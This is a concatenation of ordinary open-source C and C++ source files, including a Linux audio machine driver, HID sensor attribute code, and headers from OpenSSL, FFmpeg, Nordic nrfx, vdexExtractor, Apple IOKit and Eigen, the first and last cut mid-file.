WM8350_BCLK_DIV_4, WM8350_DACDIV_1, 64,}, {2, SNDRV_PCM_FORMAT_S24_LE, 96000, 24576000, WM8350_BCLK_DIV_4, WM8350_DACDIV_1, 64,}, {2, SNDRV_PCM_FORMAT_S24_LE, 44100, 11289600, WM8350_BCLK_DIV_4, WM8350_DACDIV_1, 64,}, {2, SNDRV_PCM_FORMAT_S24_LE, 88200, 22579200, WM8350_BCLK_DIV_4, WM8350_DACDIV_1, 64,}, }; static int wm1133_ev1_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params) { struct snd_soc_pcm_runtime *rtd = substream->private_data; struct snd_soc_dai *codec_dai = rtd->dai->codec_dai; struct snd_soc_dai *cpu_dai = rtd->dai->cpu_dai; int i, found = 0; snd_pcm_format_t format = params_format(params); unsigned int rate = params_rate(params); unsigned int channels = params_channels(params); u32 dai_format; /* find the correct audio parameters */ for (i = 0; i < ARRAY_SIZE(wm8350_audio); i++) { if (rate == wm8350_audio[i].rate && format == wm8350_audio[i].format && channels == wm8350_audio[i].channels) { found = 1; break; } } if (!found) return -EINVAL; /* codec FLL input is 14.75 MHz from MCLK */ snd_soc_dai_set_pll(codec_dai, 0, 0, 14750000, wm8350_audio[i].sysclk); dai_format = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBM_CFM; /* set codec DAI configuration */ snd_soc_dai_set_fmt(codec_dai, dai_format); /* set cpu DAI configuration */ snd_soc_dai_set_fmt(cpu_dai, dai_format); /* TODO: The SSI driver should figure this out for us */ switch (channels) { case 2: snd_soc_dai_set_tdm_slot(cpu_dai, 0xffffffc, 0xffffffc, 2, 0); break; case 1: snd_soc_dai_set_tdm_slot(cpu_dai, 0xffffffe, 0xffffffe, 1, 0); break; default: return -EINVAL; } /* set MCLK as the codec system clock for DAC and ADC */ snd_soc_dai_set_sysclk(codec_dai, WM8350_MCLK_SEL_PLL_MCLK, wm8350_audio[i].sysclk, SND_SOC_CLOCK_IN); /* set codec BCLK division for sample rate */ snd_soc_dai_set_clkdiv(codec_dai, WM8350_BCLK_CLKDIV, wm8350_audio[i].bclkdiv); /* DAI is synchronous and clocked with DAC LRCLK & ADC LRC */ snd_soc_dai_set_clkdiv(codec_dai, WM8350_DACLR_CLKDIV, wm8350_audio[i].lr_rate); snd_soc_dai_set_clkdiv(codec_dai, WM8350_ADCLR_CLKDIV, wm8350_audio[i].lr_rate); /* now configure DAC and ADC clocks */ snd_soc_dai_set_clkdiv(codec_dai, WM8350_DAC_CLKDIV, wm8350_audio[i].clkdiv); snd_soc_dai_set_clkdiv(codec_dai, WM8350_ADC_CLKDIV, wm8350_audio[i].clkdiv); return 0; } static struct snd_soc_ops wm1133_ev1_ops = { .hw_params = wm1133_ev1_hw_params, }; static const struct snd_soc_dapm_widget wm1133_ev1_widgets[] = { #ifdef USE_SIMIC SND_SOC_DAPM_MIC("SiMIC", NULL), #endif SND_SOC_DAPM_MIC("Mic1 Jack", NULL), SND_SOC_DAPM_MIC("Mic2 Jack", NULL), SND_SOC_DAPM_LINE("Line In Jack", NULL), SND_SOC_DAPM_LINE("Line Out Jack", NULL), SND_SOC_DAPM_HP("Headphone Jack", NULL), }; /* imx32ads soc_card audio map */ static const struct snd_soc_dapm_route wm1133_ev1_map[] = { #ifdef USE_SIMIC /* SiMIC --> IN1LN (with automatic bias) via SP1 */ { "IN1LN", NULL, "Mic Bias" }, { "Mic Bias", NULL, "SiMIC" }, #endif /* Mic 1 Jack --> IN1LN and IN1LP (with automatic bias) */ { "IN1LN", NULL, "Mic Bias" }, { "IN1LP", NULL, "Mic1 Jack" }, { "Mic Bias", NULL, "Mic1 Jack" }, /* Mic 2 Jack --> IN1RN and IN1RP (with automatic bias) */ { "IN1RN", NULL, "Mic Bias" }, { "IN1RP", NULL, "Mic2 Jack" }, { "Mic Bias", NULL, "Mic2 Jack" }, /* Line in Jack --> AUX (L+R) */ { "IN3R", NULL, "Line In Jack" }, { "IN3L", NULL, "Line In Jack" }, /* Out1 --> Headphone Jack */ { "Headphone Jack", NULL, "OUT1R" }, { "Headphone Jack", NULL, "OUT1L" }, /* Out1 --> Line Out Jack */ { "Line Out Jack", NULL, "OUT2R" }, { "Line Out Jack", NULL, "OUT2L" }, }; static struct snd_soc_jack hp_jack; static struct snd_soc_jack_pin hp_jack_pins[] = { { .pin = "Headphone Jack", .mask = SND_JACK_HEADPHONE }, }; static struct snd_soc_jack mic_jack; static struct snd_soc_jack_pin mic_jack_pins[] = { { .pin = "Mic1 Jack", .mask = SND_JACK_MICROPHONE }, { .pin = "Mic2 Jack", .mask = SND_JACK_MICROPHONE }, }; static int wm1133_ev1_init(struct snd_soc_codec *codec) { struct snd_soc_card *card = codec->socdev->card; snd_soc_dapm_new_controls(codec, wm1133_ev1_widgets, ARRAY_SIZE(wm1133_ev1_widgets)); snd_soc_dapm_add_routes(codec, wm1133_ev1_map, ARRAY_SIZE(wm1133_ev1_map)); /* Headphone jack detection */ snd_soc_jack_new(card, "Headphone", SND_JACK_HEADPHONE, &hp_jack); snd_soc_jack_add_pins(&hp_jack, ARRAY_SIZE(hp_jack_pins), hp_jack_pins); wm8350_hp_jack_detect(codec, WM8350_JDR, &hp_jack, SND_JACK_HEADPHONE); /* Microphone jack detection */ snd_soc_jack_new(card, "Microphone", SND_JACK_MICROPHONE | SND_JACK_BTN_0, &mic_jack); snd_soc_jack_add_pins(&mic_jack, ARRAY_SIZE(mic_jack_pins), mic_jack_pins); wm8350_mic_jack_detect(codec, &mic_jack, SND_JACK_MICROPHONE, SND_JACK_BTN_0); snd_soc_dapm_force_enable_pin(codec, "Mic Bias"); return 0; } static struct snd_soc_dai_link wm1133_ev1_dai = { .name = "WM1133-EV1", .stream_name = "Audio", .cpu_dai = &imx_ssi_pcm_dai[0], .codec_dai = &wm8350_dai, .init = wm1133_ev1_init, .ops = &wm1133_ev1_ops, .symmetric_rates = 1, }; static struct snd_soc_card wm1133_ev1 = { .name = "WM1133-EV1", .platform = &imx_soc_platform, .dai_link = &wm1133_ev1_dai, .num_links = 1, }; static struct snd_soc_device wm1133_ev1_snd_devdata = { .card = &wm1133_ev1, .codec_dev = &soc_codec_dev_wm8350, }; static struct platform_device *wm1133_ev1_snd_device; static int __init wm1133_ev1_audio_init(void) { int ret; unsigned int ptcr, pdcr; /* SSI0 mastered by port 5 */ ptcr = MXC_AUDMUX_V2_PTCR_SYN | MXC_AUDMUX_V2_PTCR_TFSDIR | MXC_AUDMUX_V2_PTCR_TFSEL(MX31_AUDMUX_PORT5_SSI_PINS_5) | MXC_AUDMUX_V2_PTCR_TCLKDIR | MXC_AUDMUX_V2_PTCR_TCSEL(MX31_AUDMUX_PORT5_SSI_PINS_5); pdcr = MXC_AUDMUX_V2_PDCR_RXDSEL(MX31_AUDMUX_PORT5_SSI_PINS_5); mxc_audmux_v2_configure_port(MX31_AUDMUX_PORT1_SSI0, ptcr, pdcr); ptcr = MXC_AUDMUX_V2_PTCR_SYN; pdcr = MXC_AUDMUX_V2_PDCR_RXDSEL(MX31_AUDMUX_PORT1_SSI0); mxc_audmux_v2_configure_port(MX31_AUDMUX_PORT5_SSI_PINS_5, ptcr, pdcr); wm1133_ev1_snd_device = platform_device_alloc("soc-audio", -1); if (!wm1133_ev1_snd_device) return -ENOMEM; platform_set_drvdata(wm1133_ev1_snd_device, &wm1133_ev1_snd_devdata); wm1133_ev1_snd_devdata.dev = &wm1133_ev1_snd_device->dev; ret = platform_device_add(wm1133_ev1_snd_device); if (ret) platform_device_put(wm1133_ev1_snd_device); return ret; } module_init(wm1133_ev1_audio_init); static void __exit wm1133_ev1_audio_exit(void) { platform_device_unregister(wm1133_ev1_snd_device); } module_exit(wm1133_ev1_audio_exit); MODULE_AUTHOR("Mark Brown <broonie@opensource.wolfsonmicro.com>"); MODULE_DESCRIPTION("Audio for WM1133-EV1 on i.MX31ADS"); MODULE_LICENSE("GPL");
{ "language": "C" }
/* ==================================================================== * Copyright (c) 1999 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ /* * This header only exists to break a circular dependency between pem and err * Ben 30 Jan 1999. */ #ifdef __cplusplus extern "C" { #endif #ifndef HEADER_PEM_H void ERR_load_PEM_strings(void); #endif #ifdef __cplusplus } #endif
{ "language": "C" }
/* * Blackmagic DeckLink common code * Copyright (c) 2013-2014 Ramiro Polla * * This file is part of FFmpeg. * * FFmpeg is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * FFmpeg is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with FFmpeg; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ struct decklink_cctx { const AVClass *cclass; void *ctx; /* Options */ int list_devices; int list_formats; double preroll; int v210; };
{ "language": "C" }
/* * HID Sensors Driver * Copyright (c) 2012, Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA. * */ #include <linux/device.h> #include <linux/platform_device.h> #include <linux/module.h> #include <linux/interrupt.h> #include <linux/irq.h> #include <linux/slab.h> #include <linux/hid-sensor-hub.h> #include <linux/iio/iio.h> #include <linux/iio/sysfs.h> static int pow_10(unsigned power) { int i; int ret = 1; for (i = 0; i < power; ++i) ret = ret * 10; return ret; } static void simple_div(int dividend, int divisor, int *whole, int *micro_frac) { int rem; int exp = 0; *micro_frac = 0; if (divisor == 0) { *whole = 0; return; } *whole = dividend/divisor; rem = dividend % divisor; if (rem) { while (rem <= divisor) { rem *= 10; exp++; } *micro_frac = (rem / divisor) * pow_10(6-exp); } } static void split_micro_fraction(unsigned int no, int exp, int *val1, int *val2) { *val1 = no/pow_10(exp); *val2 = no%pow_10(exp) * pow_10(6-exp); } /* VTF format uses exponent and variable size format. For example if the size is 2 bytes 0x0067 with VTF16E14 format -> +1.03 To convert just change to 0x67 to decimal and use two decimal as E14 stands for 10^-2. Negative numbers are 2's complement */ static void convert_from_vtf_format(u32 value, int size, int exp, int *val1, int *val2) { int sign = 1; if (value & BIT(size*8 - 1)) { value = ((1LL << (size * 8)) - value); sign = -1; } exp = hid_sensor_convert_exponent(exp); if (exp >= 0) { *val1 = sign * value * pow_10(exp); *val2 = 0; } else { split_micro_fraction(value, -exp, val1, val2); if (*val1) *val1 = sign * (*val1); else *val2 = sign * (*val2); } } static u32 convert_to_vtf_format(int size, int exp, int val1, int val2) { u32 value; int sign = 1; if (val1 < 0 || val2 < 0) sign = -1; exp = hid_sensor_convert_exponent(exp); if (exp < 0) { value = abs(val1) * pow_10(-exp); value += abs(val2) / pow_10(6+exp); } else value = abs(val1) / pow_10(exp); if (sign < 0) value = ((1LL << (size * 8)) - value); return value; } int hid_sensor_read_samp_freq_value(struct hid_sensor_common *st, int *val1, int *val2) { s32 value; int ret; ret = sensor_hub_get_feature(st->hsdev, st->poll.report_id, st->poll.index, &value); if (ret < 0 || value < 0) { *val1 = *val2 = 0; return -EINVAL; } else { if (st->poll.units == HID_USAGE_SENSOR_UNITS_MILLISECOND) simple_div(1000, value, val1, val2); else if (st->poll.units == HID_USAGE_SENSOR_UNITS_SECOND) simple_div(1, value, val1, val2); else { *val1 = *val2 = 0; return -EINVAL; } } return IIO_VAL_INT_PLUS_MICRO; } EXPORT_SYMBOL(hid_sensor_read_samp_freq_value); int hid_sensor_write_samp_freq_value(struct hid_sensor_common *st, int val1, int val2) { s32 value; int ret; if (val1 < 0 || val2 < 0) ret = -EINVAL; value = val1 * pow_10(6) + val2; if (value) { if (st->poll.units == HID_USAGE_SENSOR_UNITS_MILLISECOND) value = pow_10(9)/value; else if (st->poll.units == HID_USAGE_SENSOR_UNITS_SECOND) value = pow_10(6)/value; else value = 0; } ret = sensor_hub_set_feature(st->hsdev, st->poll.report_id, st->poll.index, value); if (ret < 0 || value < 0) ret = -EINVAL; return ret; } EXPORT_SYMBOL(hid_sensor_write_samp_freq_value); int hid_sensor_read_raw_hyst_value(struct hid_sensor_common *st, int *val1, int *val2) { s32 value; int ret; ret = sensor_hub_get_feature(st->hsdev, st->sensitivity.report_id, st->sensitivity.index, &value); if (ret < 0 || value < 0) { *val1 = *val2 = 0; return -EINVAL; } else { convert_from_vtf_format(value, st->sensitivity.size, st->sensitivity.unit_expo, val1, val2); } return IIO_VAL_INT_PLUS_MICRO; } EXPORT_SYMBOL(hid_sensor_read_raw_hyst_value); int hid_sensor_write_raw_hyst_value(struct hid_sensor_common *st, int val1, int val2) { s32 value; int ret; value = convert_to_vtf_format(st->sensitivity.size, st->sensitivity.unit_expo, val1, val2); ret = sensor_hub_set_feature(st->hsdev, st->sensitivity.report_id, st->sensitivity.index, value); if (ret < 0 || value < 0) ret = -EINVAL; return ret; } EXPORT_SYMBOL(hid_sensor_write_raw_hyst_value); int hid_sensor_parse_common_attributes(struct hid_sensor_hub_device *hsdev, u32 usage_id, struct hid_sensor_common *st) { sensor_hub_input_get_attribute_info(hsdev, HID_FEATURE_REPORT, usage_id, HID_USAGE_SENSOR_PROP_REPORT_INTERVAL, &st->poll); sensor_hub_input_get_attribute_info(hsdev, HID_FEATURE_REPORT, usage_id, HID_USAGE_SENSOR_PROP_REPORT_STATE, &st->report_state); sensor_hub_input_get_attribute_info(hsdev, HID_FEATURE_REPORT, usage_id, HID_USAGE_SENSOR_PROY_POWER_STATE, &st->power_state); sensor_hub_input_get_attribute_info(hsdev, HID_FEATURE_REPORT, usage_id, HID_USAGE_SENSOR_PROP_SENSITIVITY_ABS, &st->sensitivity); hid_dbg(hsdev->hdev, "common attributes: %x:%x, %x:%x, %x:%x %x:%x\n", st->poll.index, st->poll.report_id, st->report_state.index, st->report_state.report_id, st->power_state.index, st->power_state.report_id, st->sensitivity.index, st->sensitivity.report_id); return 0; } EXPORT_SYMBOL(hid_sensor_parse_common_attributes); MODULE_AUTHOR("Srinivas Pandruvada <srinivas.pandruvada@intel.com>"); MODULE_DESCRIPTION("HID Sensor common attribute processing"); MODULE_LICENSE("GPL");
{ "language": "C" }
/* * Copyright (c) 2017 - 2020, Nordic Semiconductor ASA * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its * contributors may be used to endorse or promote products derived from this * software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ #ifndef NRFX_H__ #define NRFX_H__ #include <nrfx_config.h> #include <drivers/nrfx_common.h> #include <hal/nrf_common.h> #include <nrfx_glue.h> #include <drivers/nrfx_errors.h> #endif // NRFX_H__
{ "language": "C" }
/* vdexExtractor ----------------------------------------- Anestis Bechtsoudis <anestis@census-labs.com> Copyright 2017 - 2018 by CENSUS S.A. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #ifndef _VDEX_DECOMPILER_010_H_ #define _VDEX_DECOMPILER_010_H_ #include "../common.h" #include "../dex.h" #include "../dex_instruction.h" #include "vdex_common.h" // Dex decompiler driver function using quicken_info data bool vdex_decompiler_010_decompile(const u1 *, dexMethod *, const vdex_data_array_t *, bool); // Dex decompiler walk method that simply disassembles code blocks void vdex_decompiler_010_walk(const u1 *, dexMethod *); #endif
{ "language": "C" }
/* * Copyright (c) 1998-2012 Apple Inc. All rights reserved. * * @APPLE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this * file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_LICENSE_HEADER_END@ */ /*! * @header IOCDBlockStorageDevice * @abstract * This header contains the IOCDBlockStorageDevice class definition. */ #ifndef _IOCDBLOCKSTORAGEDEVICE_H #define _IOCDBLOCKSTORAGEDEVICE_H #include <IOKit/storage/IOCDTypes.h> /*! * @defined kIOCDBlockStorageDeviceClass * @abstract * kIOCDBlockStorageDeviceClass is the name of the IOCDBlockStorageDevice class. * @discussion * kIOCDBlockStorageDeviceClass is the name of the IOCDBlockStorageDevice class. */ #define kIOCDBlockStorageDeviceClass "IOCDBlockStorageDevice" #ifdef KERNEL #ifdef __cplusplus /* * Kernel */ #include <IOKit/storage/IOBlockStorageDevice.h> /* Property used for matching, so the generic driver gets the nub it wants. */ #define kIOBlockStorageDeviceTypeCDROM "CDROM" /*! * @class * IOCDBlockStorageDevice : public IOBlockStorageDevice * @abstract * The IOCDBlockStorageDevice class is a generic CD block storage device * abstraction. * @discussion * This class is the protocol for generic CD functionality, independent of * the physical connection protocol (e.g. SCSI, ATA, USB). * * The APIs are the union of CD (block storage) data APIs and all * necessary low-level CD APIs. * * A subclass implements relay methods that translate our requests into * calls to a protocol- and device-specific provider. */ class IOCDBlockStorageDevice : public IOBlockStorageDevice { OSDeclareAbstractStructors(IOCDBlockStorageDevice) protected: struct ExpansionData { /* */ }; ExpansionData * _expansionData; public: /* Overrides from IORegistryEntry */ virtual bool init(OSDictionary * properties); /*-----------------------------------------*/ /* CD APIs */ /*-----------------------------------------*/ virtual IOReturn doAsyncReadCD(IOMemoryDescriptor *buffer, UInt32 block,UInt32 nblks, CDSectorArea sectorArea, CDSectorType sectorType, IOStorageCompletion completion) = 0; virtual UInt32 getMediaType(void) = 0; virtual IOReturn readISRC(UInt8 track,CDISRC isrc) = 0; virtual IOReturn readMCN(CDMCN mcn) = 0; virtual IOReturn readTOC(IOMemoryDescriptor *buffer) = 0; #ifndef __LP64__ /*-----------------------------------------*/ /* APIs exported by IOCDAudioControl */ /*-----------------------------------------*/ virtual IOReturn audioPause(bool pause) __attribute__ ((deprecated)); virtual IOReturn audioPlay(CDMSF timeStart,CDMSF timeStop) __attribute__ ((deprecated)); virtual IOReturn audioScan(CDMSF timeStart,bool reverse) __attribute__ ((deprecated)); virtual IOReturn audioStop() __attribute__ ((deprecated)); virtual IOReturn getAudioStatus(CDAudioStatus *status) __attribute__ ((deprecated)); virtual IOReturn getAudioVolume(UInt8 *leftVolume,UInt8 *rightVolume) __attribute__ ((deprecated)); virtual IOReturn setAudioVolume(UInt8 leftVolume,UInt8 rightVolume) __attribute__ ((deprecated)); #endif /* !__LP64__ */ /*-----------------------------------------*/ /* CD APIs */ /*-----------------------------------------*/ #ifdef __LP64__ virtual IOReturn getSpeed(UInt16 * kilobytesPerSecond) = 0; virtual IOReturn setSpeed(UInt16 kilobytesPerSecond) = 0; virtual IOReturn readTOC(IOMemoryDescriptor *buffer,CDTOCFormat format, UInt8 msf,UInt8 trackSessionNumber, UInt16 *actualByteCount) = 0; virtual IOReturn readDiscInfo(IOMemoryDescriptor *buffer, UInt16 *actualByteCount) = 0; virtual IOReturn readTrackInfo(IOMemoryDescriptor *buffer,UInt32 address, CDTrackInfoAddressType addressType, UInt16 *actualByteCount) = 0; #else /* !__LP64__ */ virtual IOReturn getSpeed(UInt16 * kilobytesPerSecond); /* 10.1.0 */ virtual IOReturn setSpeed(UInt16 kilobytesPerSecond); /* 10.1.0 */ virtual IOReturn readTOC(IOMemoryDescriptor *buffer,CDTOCFormat format, UInt8 msf,UInt8 trackSessionNumber, UInt16 *actualByteCount); /* 10.1.3 */ virtual IOReturn readDiscInfo(IOMemoryDescriptor *buffer, UInt16 *actualByteCount); /* 10.1.3 */ virtual IOReturn readTrackInfo(IOMemoryDescriptor *buffer,UInt32 address, CDTrackInfoAddressType addressType, UInt16 *actualByteCount); /* 10.1.3 */ #endif /* !__LP64__ */ #ifdef __LP64__ OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 0); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 1); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 2); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 3); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 4); #else /* !__LP64__ */ OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice, 0); OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice, 1); OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice, 2); OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice, 3); OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice, 4); #endif /* !__LP64__ */ OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 5); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 6); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 7); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 8); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 9); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 10); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 11); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 12); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 13); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 14); OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 15); }; #endif /* __cplusplus */ #endif /* KERNEL */ #endif /* !_IOCDBLOCKSTORAGEDEVICE_H */
{ "language": "C" }
// This file is part of Eigen, a lightweight C++ template library // for linear algebra. // // Copyright (C) 2008 Gael Guennebaud <gael.guennebaud@inria.fr> // Copyright (C) 2007-2011 Benoit Jacob <jacob.benoit.1@gmail.com> // // This Source Code Form is subject to the terms of the Mozilla // Public License v. 2.0. If a copy of the MPL was not distributed // with this file, You can obtain one at http://mozilla.org/MPL/2.0/. #ifndef EIGEN_CORE_H #define EIGEN_CORE_H // first thing Eigen does: stop the compiler from committing suicide #include "src/Core/util/DisableStupidWarnings.h" // Handle NVCC/CUDA/SYCL #if defined(__CUDACC__) || defined(__SYCL_DEVICE_ONLY__) // Do not try asserts on CUDA and SYCL! #ifndef EIGEN_NO_DEBUG #define EIGEN_NO_DEBUG #endif #ifdef EIGEN_INTERNAL_DEBUGGING #undef EIGEN_INTERNAL_DEBUGGING #endif #ifdef EIGEN_EXCEPTIONS #undef EIGEN_EXCEPTIONS #endif // All functions callable from CUDA code must be qualified with __device__ #ifdef __CUDACC__ // Do not try to vectorize on CUDA and SYCL! #ifndef EIGEN_DONT_VECTORIZE #define EIGEN_DONT_VECTORIZE #endif #define EIGEN_DEVICE_FUNC __host__ __device__ // We need math_functions.hpp to ensure that that EIGEN_USING_STD_MATH macro // works properly on the device side #include <math_functions.hpp> #else #define EIGEN_DEVICE_FUNC #endif #else #define EIGEN_DEVICE_FUNC #endif // When compiling CUDA device code with NVCC, pull in math functions from the // global namespace. In host mode, and when device doee with clang, use the // std versions. #if defined(__CUDA_ARCH__) && defined(__NVCC__) #define EIGEN_USING_STD_MATH(FUNC) using ::FUNC; #else #define EIGEN_USING_STD_MATH(FUNC) using std::FUNC; #endif #if (defined(_CPPUNWIND) || defined(__EXCEPTIONS)) && !defined(__CUDA_ARCH__) && !defined(EIGEN_EXCEPTIONS) && !defined(EIGEN_USE_SYCL) #define EIGEN_EXCEPTIONS #endif #ifdef EIGEN_EXCEPTIONS #include <new> #endif // then include this file where all our macros are defined. It's really important to do it first because // it's where we do all the alignment settings (platform detection and honoring the user's will if he // defined e.g. EIGEN_DONT_ALIGN) so it needs to be done before we do anything with vectorization. #include "src/Core/util/Macros.h" // Disable the ipa-cp-clone optimization flag with MinGW 6.x or newer (enabled by default with -O3) // See http://eigen.tuxfamily.org/bz/show_bug.cgi?id=556 for details. #if EIGEN_COMP_MINGW && EIGEN_GNUC_AT_LEAST(4,6) #pragma GCC optimize ("-fno-ipa-cp-clone") #endif #include <complex> // this include file manages BLAS and MKL related macros // and inclusion of their respective header files #include "src/Core/util/MKL_support.h" // if alignment is disabled, then disable vectorization. Note: EIGEN_MAX_ALIGN_BYTES is the proper check, it takes into // account both the user's will (EIGEN_MAX_ALIGN_BYTES,EIGEN_DONT_ALIGN) and our own platform checks #if EIGEN_MAX_ALIGN_BYTES==0 #ifndef EIGEN_DONT_VECTORIZE #define EIGEN_DONT_VECTORIZE #endif #endif #if EIGEN_COMP_MSVC #include <malloc.h> // for _aligned_malloc -- need it regardless of whether vectorization is enabled #if (EIGEN_COMP_MSVC >= 1500) // 2008 or later // Remember that usage of defined() in a #define is undefined by the standard. // a user reported that in 64-bit mode, MSVC doesn't care to define _M_IX86_FP. #if (defined(_M_IX86_FP) && (_M_IX86_FP >= 2)) || EIGEN_ARCH_x86_64 #define EIGEN_SSE2_ON_MSVC_2008_OR_LATER #endif #endif #else // Remember that usage of defined() in a #define is undefined by the standard #if (defined __SSE2__) && ( (!EIGEN_COMP_GNUC) || EIGEN_COMP_ICC || EIGEN_GNUC_AT_LEAST(4,2) ) #define EIGEN_SSE2_ON_NON_MSVC_BUT_NOT_OLD_GCC #endif #endif #ifndef EIGEN_DONT_VECTORIZE #if defined (EIGEN_SSE2_ON_NON_MSVC_BUT_NOT_OLD_GCC) || defined(EIGEN_SSE2_ON_MSVC_2008_OR_LATER) // Defines symbols for compile-time detection of which instructions are // used. // EIGEN_VECTORIZE_YY is defined if and only if the instruction set YY is used #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_SSE #define EIGEN_VECTORIZE_SSE2 // 